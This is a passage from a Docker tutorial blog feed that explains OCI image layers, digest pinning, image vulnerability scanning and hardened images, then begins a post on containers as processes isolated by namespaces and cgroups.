<p>A Docker image is an <strong>OCI artifact</strong>. It consists of:</p>
<ol>
<li><p><strong>A manifest</strong> - a JSON document listing references to filesystem diffs and configuration</p>
</li>
<li><p><strong>Blobs</strong> - compressed tarballs containing filesystem changes</p>
</li>
<li><p><strong>A config</strong> - JSON metadata (environment variables, entrypoint, exposed ports)</p>
</li>
</ol>
<p>When you run <code>docker pull nginx:alpine</code>, Docker contacts a registry, downloads that manifest, then fetches the blobs it doesn't already have. That's it. There is no magic.</p>
<p>The OCI (Open Container Initiative) standardized this format so that images are portable across any compliant runtime — Docker, Podman, containerd, you name it. An image is not a Docker-specific thing. It's a distribution format for filesystem snapshots.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> The word "image" is misleading. There is no single file. An image is a collection of independently addressable, content-hashed blobs assembled by a manifest. When you "pull an image," you are downloading a graph of content-addressed objects. Understanding this changes how you think about caching, sharing, and security.</p>
</blockquote>
<hr />
<h2>Layers - The Real Story</h2>
<p>Every instruction in a Dockerfile produces a filesystem snapshot. Docker uses a <strong>union filesystem</strong> (OverlayFS on Linux) to stack these snapshots and present them as a single coherent filesystem to the container.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/dcc9ed12-fef1-42ee-b34b-23902fbed7ab.png" alt="" style="display:block;margin:0 auto" />

<p>Here's what this means in practice:</p>
<ul>
<li><p><strong>Each layer is a diff.</strong> It records what files were added, modified, or deleted compared to the layer below it.</p>
</li>
<li><p><strong>Layers are content-addressed.</strong> Each one has a SHA256 digest. Same content = same hash = stored once.</p>
</li>
<li><p><strong>Copy-on-write.</strong> When a container starts, Docker adds a thin writable layer on top. Reads fall through to the image layers. Writes get captured in the writable layer. The image layers are never touched.</p>
</li>
</ul>
<p>This is why <code>docker pull</code> says "Already exists" for layers you already have from another image. If <code>nginx:alpine</code> and <code>redis:7-alpine</code> share the same Alpine base layer, Docker stores it once, and both images reference it.</p>
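<p>Here is a toy content-addressed store in Python that shows why the shared layer is stored only once. The layer bytes and the <code>BlobStore</code> class are invented for illustration. Docker's real storage is more involved, but the keying idea is the same.</p>
<pre><code class="language-python">import hashlib


class BlobStore:
    """Toy content-addressed store: the key of a blob is the hash of its bytes."""

    def __init__(self):
        self.blobs = {}

    def put(self, data):
        """Store the bytes under their digest and report whether they were already there."""
        digest = "sha256:" + hashlib.sha256(data).hexdigest()
        already_exists = digest in self.blobs
        self.blobs[digest] = data
        return digest, already_exists


store = BlobStore()
alpine_base = b"bytes of a shared Alpine base layer"

# Two hypothetical images that share the same base layer.
images = {
    "nginx:alpine": [alpine_base, b"nginx files"],
    "redis:7-alpine": [alpine_base, b"redis files"],
}

for name, layers in images.items():
    for layer in layers:
        digest, already_exists = store.put(layer)
        status = "Already exists" if already_exists else "Pull complete"
        print(name, digest[:19], status)

print("layers referenced:", sum(len(layers) for layers in images.values()))
print("blobs stored:", len(store.blobs))
</code></pre>
<p>Four layer references, three stored blobs. The second image gets its base layer for free because the digest is already present.</p>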
<p>Let's see this with a real image. Pull <code>nginx:alpine</code> and then inspect its history:</p>
<pre><code class="language-bash">docker pull nginx:alpine
</code></pre>
<pre><code class="language-console">alpine: Pulling from library/nginx
d17f077ada11: Pull complete
910c2a6cad6d: Pull complete
a89d14ef5abe: Pull complete
a96b658a00fe: Pull complete
10cbc192f783: Pull complete
634f1d1ce0f7: Pull complete
83fbf849ee89: Pull complete
662c8d6f6620: Pull complete
Digest: sha256:5616878291a2eed594aee8db4dade5878cf7edcb475e59193904b198d9b830de
Status: Downloaded newer image for nginx:alpine
docker.io/library/nginx:alpine
</code></pre>
<p>Now look at how the image was built:</p>
<pre><code class="language-bash">docker history nginx:alpine
</code></pre>
<pre><code class="language-console">IMAGE          CREATED      CREATED BY                                      SIZE
7f7dcd27f920   6 days ago   RUN /bin/sh -c set -x &amp;&amp; apkArch="$(cat ...    48.3MB
&lt;missing&gt;      6 days ago   CMD ["nginx" "-g" "daemon off;"]                0B
&lt;missing&gt;      6 days ago   STOPSIGNAL SIGQUIT                              0B
&lt;missing&gt;      6 days ago   EXPOSE map[80/tcp:{}]                           0B
&lt;missing&gt;      6 days ago   ENTRYPOINT ["/docker-entrypoint.sh"]            0B
&lt;missing&gt;      6 days ago   COPY 30-tune-worker-processes.sh...             4.62kB
&lt;missing&gt;      6 days ago   RUN /bin/sh -c set -x &amp;&amp; addgroup -g 101...    4.51MB
&lt;missing&gt;      6 days ago   ENV NGINX_VERSION=1.29.8                        0B
&lt;missing&gt;      6 days ago   CMD ["/bin/sh"]                                 0B
&lt;missing&gt;      6 days ago   ADD alpine-minirootfs-3.23.3-aarch64.tar.gz    8.7MB
</code></pre>
<p>Read bottom-to-top. The base Alpine filesystem is 8.7 MB. The final nginx install step adds 48.3 MB. <code>CMD</code>, <code>ENV</code>, and <code>EXPOSE</code> create 0-byte metadata-only layers. The <code>&lt;missing&gt;</code> entries mean those layers were built on a remote build server, so their intermediate image IDs are not available locally, which is completely normal for pulled images.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Not every Dockerfile instruction creates a layer that takes disk space. Only <code>RUN</code>, <code>COPY</code>, and <code>ADD</code> produce filesystem changes. Everything else (<code>CMD</code>, <code>ENV</code>, <code>EXPOSE</code>, <code>LABEL</code>, <code>ENTRYPOINT</code>) is metadata written into the image config JSON. When you see "0B" in <code>docker history</code>, that's why.</p>
</blockquote>
<hr />
<h2>The Supply Chain Problem</h2>
<p>Images come from registries. Registries can be compromised. And in March 2026, they were.</p>
<p>Attackers pushed backdoored versions of the Trivy vulnerability scanner to Docker Hub. Trivy — the tool that organizations run in their CI/CD pipelines to <em>detect</em> compromised images — was itself compromised. The backdoored images exfiltrated environment variables, secrets, and CI tokens from every pipeline that pulled them. Thousands of organizations were affected before the images were pulled down.</p>
<p>Think about that. The security tool was the attack vector.</p>
<p>This isn't a hypothetical. This happened. And it happened because most teams treat <code>docker pull</code> like <code>apt install</code>: they assume the registry is trustworthy and the image is what it claims to be.</p>
<p><strong>Your images are a supply chain.</strong> Every <code>FROM</code> in your Dockerfile, every base image you pull, every tool you run in CI — it's a link in that chain. One compromised link and everything downstream is exposed.</p>
<hr />
<h2>Docker Scout: Not Optional in 2026</h2>
<p>After March 2026, image scanning is not a "nice to have." Docker Scout is built into the Docker CLI and gives you visibility into what's inside your images.</p>
<p>Start with a quick overview:</p>
<pre><code class="language-bash">docker scout quickview nginx:alpine
</code></pre>
<pre><code class="language-console"> Target             │  nginx:alpine            │    0C     2H     9M     1L     1?
   digest           │  7f7dcd27f920            │
 Base image         │  nginx:1-alpine-slim     │    0C     0H     1M     0L
 Updated base image │  nginx:1.30-alpine-slim  │    0C     0H     1M     0L
</code></pre>
<p>Zero critical. 2 high. 9 medium. This is actually a <em>good</em> result: nginx:alpine was patched just days ago. But run this same scan on an image you haven't updated in 3 months and watch the numbers explode. The point is: <strong>you wouldn't know without scanning.</strong></p>
<p>Let's dig into what's still there:</p>
<pre><code class="language-bash">docker scout cves nginx:alpine --only-severity critical,high
</code></pre>
<pre><code class="language-console">## Packages and Vulnerabilities

   0C     1H     0M     0L  nghttp2 1.68.0-r0

    ✗ HIGH CVE-2026-27135
      https://scout.docker.com/v/CVE-2026-27135
      Affected range : &lt;=1.68.0-r0
      Fixed version  : not fixed

   0C     1H     0M     0L  curl 8.17.0-r1

    ✗ HIGH CVE-2026-3805
      https://scout.docker.com/v/CVE-2026-3805
      Affected range : &lt;=8.17.0-r1
      Fixed version  : not fixed

2 vulnerabilities found in 2 packages
  CRITICAL  0
  HIGH      2
</code></pre>
<p>Even a freshly pulled, just-patched image has 2 high-severity CVEs, and both still say "not fixed". These are publicly disclosed vulnerabilities in curl and nghttp2 with no fix available yet, sitting in every nginx:alpine container on the planet right now. Imagine what your 6-month-old base image looks like.</p>
<p>Docker Scout generates SBOMs (Software Bills of Materials), tracks CVEs across your image catalog, and integrates with CI. If you're not running this, you're flying blind.</p>
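<p>For the CI side, one possible gate is sketched below. It relies on the <code>--exit-code</code> flag of <code>docker scout cves</code>, which makes the command return a non-zero status when matching vulnerabilities are found. <code>scan_gate</code> is a hypothetical wrapper name, not something Docker ships.</p>
<pre><code class="language-bash"># Hypothetical CI gate: fail the job when critical or high CVEs are reported.
scan_gate() {
  if docker scout cves --exit-code --only-severity critical,high "$1"; then
    echo "PASS: no critical/high CVEs reported for $1"
  else
    echo "FAIL: critical/high CVEs reported for $1"
    return 1
  fi
}
</code></pre>
<p>Note that a gate this strict would fail on the <code>nginx:alpine</code> scan above, because of its two unfixed high-severity CVEs. Whether to block on findings that have no fix yet is a policy decision for your team.</p>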
<h2>Docker Hardened Images (DHI)</h2>
<p>Docker released Hardened Images as a direct response to the supply chain crisis. Here's what they offer:</p>
<ul>
<li><p><strong>95% fewer CVEs</strong> compared to standard Docker Hub images</p>
</li>
<li><p><strong>Rootless by default</strong> - no process runs as root</p>
</li>
<li><p><strong>Distroless runtime</strong> - minimal attack surface, no shell, no package manager</p>
</li>
<li><p><strong>7-day fix guarantee</strong> - critical CVEs patched within a week</p>
</li>
<li><p><strong>1000+ images</strong> available and growing</p>
</li>
<li><p><strong>Free and open source</strong> under Apache 2.0</p>
</li>
</ul>
<p>In practice, switching from <code>nginx:alpine</code> to a Docker Hardened Image means you inherit a fraction of the vulnerability surface. For anything running in production, DHI should be your default starting point.</p>
<blockquote>
<p><strong>Pro Tip:</strong> DHI images are distroless at runtime - there is no shell to <code>docker exec</code> into for debugging. During development, use the standard image. In your production Dockerfile stage, switch to the DHI variant. Multi-stage builds (Day 3) make this trivial.</p>
</blockquote>
<hr />
<h2>Image Naming - More Than You Think</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/b59d276b-d277-48f4-83fb-84224ee0dc92.png" alt="" style="display:block;margin:0 auto" />

<p>The full format of an image reference:</p>
<pre><code class="language-plaintext">registry/namespace/repository:tag@sha256:digest
</code></pre>
<table>
<thead>
<tr>
<th>Component</th>
<th>Example</th>
<th>Default</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Registry</strong></td>
<td><code>docker.io</code>, <code>ghcr.io</code>, <code>123456.dkr.ecr.us-east-1.amazonaws.com</code></td>
<td><code>docker.io</code></td>
</tr>
<tr>
<td><strong>Namespace</strong></td>
<td><code>library</code> (official), <code>myuser</code>, <code>myorg</code></td>
<td><code>library</code></td>
</tr>
<tr>
<td><strong>Repository</strong></td>
<td><code>nginx</code>, <code>redis</code>, <code>myapp</code></td>
<td><em>(required)</em></td>
</tr>
<tr>
<td><strong>Tag</strong></td>
<td><code>alpine</code>, <code>1.29.3</code>, <code>latest</code></td>
<td><code>latest</code></td>
</tr>
<tr>
<td><strong>Digest</strong></td>
<td><code>sha256:4ff102e6b2d5f84...</code></td>
<td><em>(none)</em></td>
</tr>
</tbody></table>
<p>These are all equivalent:</p>
<pre><code class="language-plaintext">nginx
nginx:latest
library/nginx:latest
docker.io/library/nginx:latest
</code></pre>
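<p>The default-filling rules from the table can be sketched as a small shell function. This is a simplified illustration, not Docker's actual parser: <code>normalize_ref</code> is a hypothetical name, and it assumes a first path component is a registry only when it contains a dot or a colon, or is <code>localhost</code>.</p>
<pre><code class="language-bash"># Hypothetical helper: expand a short image reference to its full form.
normalize_ref() {
  ref="$1"; digest=""; tag=""; registry="docker.io"
  # Split off an optional @sha256:... digest.
  case "$ref" in
    *@*) digest="@${ref#*@}"; ref="${ref%%@*}" ;;
  esac
  # Treat the first component as a registry host if it looks like one.
  case "$ref" in
    */*)
      first="${ref%%/*}"
      case "$first" in
        *.*|*:*|localhost) registry="$first"; ref="${ref#*/}" ;;
      esac ;;
  esac
  # A colon in the last path component introduces the tag.
  path="$ref"
  case "${ref##*/}" in
    *:*) tag="${ref##*:}"; path="${ref%:*}" ;;
  esac
  # Official Docker Hub images live under the implicit "library" namespace.
  if [ "$registry" = "docker.io" ]; then
    case "$path" in
      */*) ;;
      *) path="library/$path" ;;
    esac
  fi
  # Default to "latest" only when neither a tag nor a digest was given.
  if [ -z "$tag$digest" ]; then tag="latest"; fi
  printf '%s/%s%s%s\n' "$registry" "$path" "${tag:+:$tag}" "$digest"
}
</code></pre>
<p>Passing any of the four references above to <code>normalize_ref</code> yields <code>docker.io/library/nginx:latest</code>, while a reference such as <code>ghcr.io/myorg/myapp:1.2</code> comes back unchanged.</p>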
<p>Tags are <strong>mutable</strong>. Digests are <strong>immutable</strong>. This distinction matters more than almost anything else in this post.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> An image tagged <code>:latest</code> today and <code>:latest</code> tomorrow can be completely different binaries. Tags are pointers that can be moved. Anyone with push access can retag an image at any time. Digests are content hashes that cannot be faked. In production, pin <code>sha256</code> digests. In the March 2026 Trivy attack, the malicious images were pushed under <em>existing tags</em> — anyone pulling by tag got the backdoor. Anyone pinning by digest was unaffected.</p>
</blockquote>
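<p>To pin in practice, you first need the digest behind a tag. Here is a minimal sketch, assuming the image was pulled from a registry (locally built images that were never pushed have no <code>RepoDigests</code> entry). <code>pin_ref</code> is a hypothetical helper name.</p>
<pre><code class="language-bash"># Hypothetical helper: resolve a pulled tag to its digest-pinned reference.
pin_ref() {
  # RepoDigests lists "repository@sha256:..." entries recorded at pull time.
  docker image inspect --format '{{index .RepoDigests 0}}' "$1"
}
</code></pre>
<p>After a <code>docker pull nginx:alpine</code>, calling <code>pin_ref nginx:alpine</code> should print a reference of the form <code>nginx@sha256:...</code>. That string can go into a <code>FROM</code> line or a <code>docker run</code> command in place of the tag.</p>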
<hr />
<h2>Hands-On: Inspect, Scan, Understand</h2>
<p>Let's put it all together. Run these commands and understand what each one tells you.</p>
<p><strong>Check what's on disk:</strong></p>
<pre><code class="language-bash">docker images --format "table {{.Repository}}\t{{.Tag}}\t{{.Size}}" | head -15
</code></pre>
<pre><code class="language-console">REPOSITORY    TAG         SIZE
node          20-alpine   136MB
nginx         alpine      53.4MB
ubuntu        latest      101MB
hello-world   latest      5.2kB
alpine        latest      8.51MB
redis         7-alpine    41.7MB
</code></pre>
<p>Alpine is 8.51 MB. Ubuntu is 101 MB. For a base image, that's a roughly 12x difference in size, and far more packages for an attacker to target, before you've installed anything.</p>
<p><strong>Check disk usage across all Docker resources:</strong></p>
<pre><code class="language-bash">docker system df
</code></pre>
<pre><code class="language-console">TYPE            TOTAL     ACTIVE    SIZE      RECLAIMABLE
Images          86        17        22.49GB   5.294GB (23%)
Containers      41        0         366MB     366MB (100%)
Local Volumes   14        5         1.721GB   1.676GB (97%)
Build Cache     56        0         1.926GB   278.2kB
</code></pre>
<p>22.49 GB in images. 41 stopped containers taking 366 MB. 1.9 GB of build cache. Run <code>docker system prune -a</code> periodically, or this grows without bound.</p>
<p><strong>Pull process visualized:</strong></p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/4c326005-1f16-49e5-966d-35c33d39ac27.png" alt="" style="display:block;margin:0 auto" />

<p>When you <code>docker pull nginx:alpine</code>:</p>
<ol>
<li><p>Docker resolves <code>nginx:alpine</code> to <code>docker.io/library/nginx:alpine</code></p>
</li>
<li><p>Contacts the registry, fetches the manifest</p>
</li>
<li><p>Checks each layer against local storage</p>
</li>
<li><p>Downloads missing layers in parallel (compressed)</p>
</li>
<li><p>Verifies every layer's SHA256 digest</p>
</li>
<li><p>Assembles the image locally</p>
</li>
</ol>
<p>If any digest doesn't match, the pull fails. This is content-addressable storage doing its job - but it only protects you against tampering <em>in transit</em>, not a compromised image at the source.</p>
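<p>The verification in step 5 boils down to hashing the downloaded bytes and comparing the result with the digest the manifest promised. A minimal sketch of that idea follows. It assumes the GNU <code>sha256sum</code> tool is available (on macOS, <code>shasum -a 256</code> plays the same role), and <code>verify_blob</code> is a hypothetical name, not a Docker command.</p>
<pre><code class="language-bash"># Hypothetical helper: check a file against an expected sha256 digest.
verify_blob() {
  blob="$1"; expected="$2"
  # Hash the file and prefix the result the way OCI digests are written.
  actual="sha256:$(sha256sum "$blob" | cut -d' ' -f1)"
  if [ "$actual" = "$expected" ]; then
    echo "ok: $blob matches $expected"
  else
    echo "MISMATCH: $blob is $actual, expected $expected"
    return 1
  fi
}
</code></pre>
<p>The check only proves the bytes match the digest you asked for. If the publisher's own build was compromised, the malicious layer hashes correctly too.</p>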
<blockquote>
<p><strong>Pro Tip:</strong> Need to pull for a different architecture? Use <code>--platform</code>: <code>docker pull --platform linux/amd64 nginx:alpine</code>. This is common when building on Apple Silicon for amd64 deployment targets.</p>
</blockquote>
<hr />
<h2>Quick Reference</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What It Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker pull nginx:alpine</code></td>
<td>Download image from registry</td>
</tr>
<tr>
<td><code>docker images</code></td>
<td>List local images</td>
</tr>
<tr>
<td><code>docker history nginx:alpine</code></td>
<td>Show layers and their sizes</td>
</tr>
<tr>
<td><code>docker inspect nginx:alpine</code></td>
<td>Full JSON metadata</td>
</tr>
<tr>
<td><code>docker scout quickview nginx:alpine</code></td>
<td>Vulnerability summary</td>
</tr>
<tr>
<td><code>docker scout cves nginx:alpine</code></td>
<td>Detailed CVE listing</td>
</tr>
<tr>
<td><code>docker system df</code></td>
<td>Disk usage breakdown</td>
</tr>
<tr>
<td><code>docker image prune -a</code></td>
<td>Remove all unused images</td>
</tr>
<tr>
<td><code>docker system prune -a</code></td>
<td>Full cleanup (images, containers, cache)</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>Concept</th>
<th>Key Point</th>
</tr>
</thead>
<tbody><tr>
<td><strong>OCI image</strong></td>
<td>A manifest + blobs + config, not a single file</td>
</tr>
<tr>
<td><strong>Layers</strong></td>
<td>Filesystem diffs, content-addressed, shared across images</td>
</tr>
<tr>
<td><strong>Tags</strong></td>
<td>Mutable pointers — can change at any time</td>
</tr>
<tr>
<td><strong>Digests</strong></td>
<td>Immutable content hashes — pin these in production</td>
</tr>
<tr>
<td><strong>Docker Scout</strong></td>
<td>Scan images, generate SBOMs, catch CVEs before deploy</td>
</tr>
<tr>
<td><strong>DHI</strong></td>
<td>Hardened images: 95% fewer CVEs, rootless, distroless, free</td>
</tr>
<tr>
<td><strong>Copy-on-write</strong></td>
<td>Containers share image layers, writes go to the writable layer</td>
</tr>
</tbody></table>
<hr />
<h2>What's Next: Day 3</h2>
<p>You now know what images are, how the supply chain works, and why scanning is non-negotiable. But you've only pulled images other people built.</p>
<p>On <strong>Day 3: Building Images with Dockerfiles</strong>, you'll write your own. You'll learn the build cache, layer ordering, multi-stage builds, and how to produce images that are small, fast, and don't ship with a shell an attacker can use.</p>
<p>See you tomorrow.</p>
]]></content:encoded></item><item><title><![CDATA[Day 1: What Actually Happens When You Type docker run]]></title><description><![CDATA[7 Days of Docker (2026) — A Docker Captain's guide. Not your average tutorial.

I'm a Docker Captain. I've seen many Docker tutorials on the internet. And they all start the same way:
"Docker is like ]]></description><link>https://blog.kubesimplify.com/day-1-what-actually-happens-when-you-type-docker-run</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-1-what-actually-happens-when-you-type-docker-run</guid><category><![CDATA[Docker]]></category><category><![CDATA[containers]]></category><category><![CDATA[Devops]]></category><category><![CDATA[cloud native]]></category><category><![CDATA[Linux]]></category><category><![CDATA[docker desktop]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Wed, 22 Apr 2026 10:38:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/2f51276b-c5fb-4038-ac4d-939c7cbb4816.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> — A Docker Captain's guide. Not your average tutorial.</p>
</blockquote>
<p>I'm a Docker Captain. I've seen many Docker tutorials on the internet. And they all start the same way:</p>
<p><em>"Docker is like a virtual machine, but lighter..."</em></p>
<p>No. Let's stop doing that.</p>
<p>I'm going to explain Docker the way I wish someone had explained it to me — from the inside out. No VM comparisons. No shipping container analogies. Just what's actually happening on your machine right now.</p>
<hr />
<h2>A Container Is Just a Process</h2>
<p>That's it. That's the tweet.</p>
<p>When you run <code>docker run nginx</code>, you're not spinning up a virtual machine. You're not creating a miniature computer. You're starting a <strong>Linux process</strong> — the nginx binary — with two restrictions:</p>
<ol>
<li><p><strong>It can only SEE certain things</strong> (namespaces)</p>
</li>
<li><p><strong>It can only USE certain resources</strong> (cgroups)</p>
</li>
</ol>
<p>That's a container. A restricted process. Let me prove it.</p>
<pre><code class="language-bash">docker run -d --name my-nginx nginx:alpine
</code></pre>
<p>Now let's look at it from the host's perspective:</p>
<pre><code class="language-bash">docker top my-nginx
</code></pre>
<pre><code class="language-console">UID    PID    PPID   C   STIME   TTY   TIME       CMD
root   15290  15267  0   09:31   ?     00:00:00   nginx: master process nginx -g daemon off;
statd  15327  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15328  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15329  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15330  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15331  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15332  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15333  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15334  15290  0   09:31   ?     00:00:00   nginx: worker process
</code></pre>
<p>See those PIDs? Those are <strong>regular processes</strong> on your machine. One master, eight workers (one per CPU core on this M2). They show up in the process table just like any other program. They're not in a VM. They're not in a sandbox. They're processes.</p>
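<p>One way to cross-check this is to ask Docker which PID it recorded for the container's main process. A small sketch, where <code>container_pid</code> is a hypothetical helper name. On Docker Desktop, the PID belongs to the Linux VM rather than to macOS itself.</p>
<pre><code class="language-bash"># Hypothetical helper: print the PID of a container's main process.
container_pid() {
  # .State.Pid is the PID as seen from the machine running the Docker daemon.
  docker inspect --format '{{.State.Pid}}' "$1"
}
</code></pre>
<p>On a Linux host, <code>ps -p "$(container_pid my-nginx)"</code> should then show the nginx master process in the ordinary process table.</p>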
<p>So what makes it a "container"?</p>
<hr />
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/73100fa4-d224-4148-94e3-bf8709fe5824.png" alt="" style="display:block;margin:0 auto" />

<h2>The Two Ingredients: Namespaces and Cgroups</h2>
<h3>Namespaces: What the process can SEE</h3>
<p>Linux namespaces are walls. They control what a process is allowed to perceive:</p>
<table>
<thead>
<tr>
<th>Namespace</th>
<th>What it hides</th>
</tr>
</thead>
<tbody><tr>
<td><strong>PID</strong></td>
<td>Other processes — the container thinks it's PID 1</td>
</tr>
<tr>
<td><strong>NET</strong></td>
<td>The host's network — the container gets its own IP</td>
</tr>
<tr>
<td><strong>MNT</strong></td>
<td>The host's filesystem — the container sees only its own files</td>
</tr>
<tr>
<td><strong>UTS</strong></td>
<td>The hostname — the container has its own hostname</td>
</tr>
<tr>
<td><strong>IPC</strong></td>
<td>Inter-process communication — isolated shared memory</td>
</tr>
<tr>
<td><strong>USER</strong></td>
<td>User IDs (root inside the container can map to an unprivileged user outside; in Docker this is opt-in via userns-remap or rootless mode)</td>
</tr>
</tbody></table>
<p>When you're "inside" a container and type <code>ps aux</code>, you see maybe 2-3 processes. On the host, there are hundreds. The container doesn't know that. Its PID namespace hides everything else.</p>
<p>The container isn't isolated because it's in a separate machine. It's isolated because <strong>the kernel lies to it</strong>.</p>
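<p>Linux exposes each process's namespace memberships as symlinks under <code>/proc/PID/ns</code>, so you can inspect them directly. The sketch below assumes a Linux system with <code>/proc</code> mounted (on a Mac, run it inside a container). <code>list_namespaces</code> is a hypothetical helper name.</p>
<pre><code class="language-bash"># Hypothetical helper: print the namespace identifiers of a process.
list_namespaces() {
  # Default to the calling process when no PID is given.
  pid="${1:-self}"
  for ns in pid net mnt uts ipc user; do
    # Each symlink resolves to something like "pid:[4026531836]".
    printf '%s\t%s\n' "$ns" "$(readlink "/proc/$pid/ns/$ns")"
  done
}
</code></pre>
<p>Two processes that print the same identifier for a row share that namespace. Comparing the host shell with a container's main process (which needs root to read) should show different identifiers for the namespaces Docker created.</p>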
<h3>Cgroups: What the process can USE</h3>
<p>Control groups limit resources:</p>
<pre><code class="language-bash">docker run --memory=128m --cpus=0.5 nginx:alpine
</code></pre>
<p>This process can never use more than 128MB of RAM or half a CPU core. The kernel enforces this. The container starts and runs fine — nginx barely uses 10MB. But if it ever tries to allocate <em>beyond</em> 128MB, the kernel OOM-kills it. The limit is a ceiling, not a cage. Most processes never hit it. But a memory leak or a traffic spike that exhausts the limit? The process dies instantly. That's the point — one runaway container can't take down the entire host.</p>
<pre><code class="language-console">$ docker run --rm --memory=128m alpine cat /sys/fs/cgroup/memory.max
134217728
</code></pre>
<p>134,217,728 bytes. Exactly 128 megabytes. The kernel sets this limit at the cgroup level, and the process can never escape it.</p>
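<p>The number is just the suffix arithmetic: <code>m</code> here means 1024 × 1024 bytes. A quick sketch of the conversion, where <code>mem_to_bytes</code> is a hypothetical helper that handles only the <code>k</code>, <code>m</code>, and <code>g</code> suffixes:</p>
<pre><code class="language-bash"># Hypothetical helper: convert a --memory style value to bytes.
mem_to_bytes() {
  value="$1"
  # Strip one trailing unit letter, if present.
  number="${value%[kmgKMG]}"
  case "$value" in
    *[kK]) echo $((number * 1024)) ;;
    *[mM]) echo $((number * 1024 * 1024)) ;;
    *[gG]) echo $((number * 1024 * 1024 * 1024)) ;;
    *) echo "$number" ;;
  esac
}
</code></pre>
<p><code>mem_to_bytes 128m</code> prints <code>134217728</code>, the same value the kernel reports in <code>memory.max</code>.</p>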
<blockquote>
<p><strong>That's it.</strong> Namespaces + Cgroups = Container. Docker didn't invent containers. Docker made them usable.</p>
</blockquote>
<hr />
<h2>So What Does Docker Actually Do?</h2>
<p>If containers are just kernel features, why do we need Docker?</p>
<p>Because doing this manually is miserable. Without Docker, to "containerize" a process, you'd need to:</p>
<ul>
<li><p>Call <code>unshare()</code> and <code>clone()</code> system calls to create namespaces</p>
</li>
<li><p>Set up cgroup hierarchies in <code>/sys/fs/cgroup/</code></p>
</li>
<li><p>Build a root filesystem by hand</p>
</li>
<li><p>Configure networking with <code>veth</code> pairs and <code>iptables</code></p>
</li>
<li><p>Handle image distribution yourself</p>
</li>
</ul>
<p>Docker wraps all of this into one command:</p>
<pre><code class="language-bash">docker run -d -p 8080:80 nginx:alpine
</code></pre>
<p>One line. Docker:</p>
<ol>
<li><p>Pulls the <code>nginx:alpine</code> image (a packaged filesystem)</p>
</li>
<li><p>Creates namespaces (PID, NET, MNT, UTS, IPC)</p>
</li>
<li><p>Sets up cgroups for resource limits</p>
</li>
<li><p>Configures a virtual network interface</p>
</li>
<li><p>Mounts the image as a layered filesystem</p>
</li>
<li><p>Starts the process</p>
</li>
</ol>
<pre><code class="language-console">$ docker run -d --name day1-nginx -p 8080:80 nginx:alpine
a45dc5a898449edc5e4ecfbca6fc3c22db6f77901e1114f26057c45ff3dacaa7

$ curl -s http://localhost:8080 | head -3
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
</code></pre>
<p>A web server. Running. In under a second. That hash? It's the container ID — a unique identifier for this particular set of namespaces and cgroups.</p>
<hr />
<h2>"But Wait — I'm on a Mac"</h2>
<p>Here's something most tutorials never tell you:</p>
<p><strong>Containers are a Linux kernel feature. macOS doesn't have a Linux kernel.</strong></p>
<p>So how is Docker running on your Mac right now?</p>
<pre><code class="language-console">$ docker version
Client:
 Version:    29.1.5
 OS/Arch:    darwin/arm64

Server: Docker Desktop 4.58.1
 Engine:
  Version:   29.1.5
  OS/Arch:   linux/arm64
</code></pre>
<p>See that? Client: <code>darwin/arm64</code> (your Mac). Server: <code>linux/arm64</code> (not your Mac).</p>
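<p>If you only want that one comparison, <code>docker version</code> accepts a Go template. A small sketch, with <code>docker_platforms</code> as a hypothetical helper name:</p>
<pre><code class="language-bash"># Hypothetical helper: show where the CLI runs versus where the daemon runs.
docker_platforms() {
  docker version --format 'client={{.Client.Os}}/{{.Client.Arch}} server={{.Server.Os}}/{{.Server.Arch}}'
}
</code></pre>
<p>On the setup shown above, this should print <code>client=darwin/arm64 server=linux/arm64</code>. On a native Linux install, both sides report <code>linux</code>.</p>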
<p>Docker Desktop runs a <strong>lightweight Linux virtual machine</strong> in the background. On Apple Silicon Macs, you get two choices for the Virtual Machine Manager (VMM):</p>
<ul>
<li><p><strong>Apple Virtualization framework</strong> — the stable, well-established option that leverages Apple's native hypervisor. This is what most people use (and what I'm running right now).</p>
</li>
<li><p><strong>Docker VMM</strong> (Beta) — Docker's own container-optimized hypervisor, built specifically for Apple Silicon. Promises better performance for container workloads.</p>
</li>
</ul>
<p>Both options also let you enable <strong>Rosetta for x86_64/amd64 emulation</strong> — so you can run Intel-based images on your ARM Mac without QEMU. And for file sharing between Mac and the Linux VM, you choose between <strong>VirtioFS</strong> (fastest, recommended), gRPC FUSE, or osxfs (legacy).</p>
<p>Your containers live inside this Linux VM. The flow:</p>
<ol>
<li><p>You type <code>docker run</code> on your Mac (the client)</p>
</li>
<li><p>The command goes to the Docker daemon inside the Linux VM (the server)</p>
</li>
<li><p>The daemon creates namespaces and cgroups in that Linux kernel</p>
</li>
<li><p>Your container runs inside the VM</p>
</li>
</ol>
<p>You never see the VM. You never configure it. But it's there. On a Linux server? No VM needed — containers talk directly to the host kernel.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/7311b493-e073-45c3-a6f4-14c1b0e1c26b.png" alt="" style="display:block;margin:0 auto" />

<blockquote>
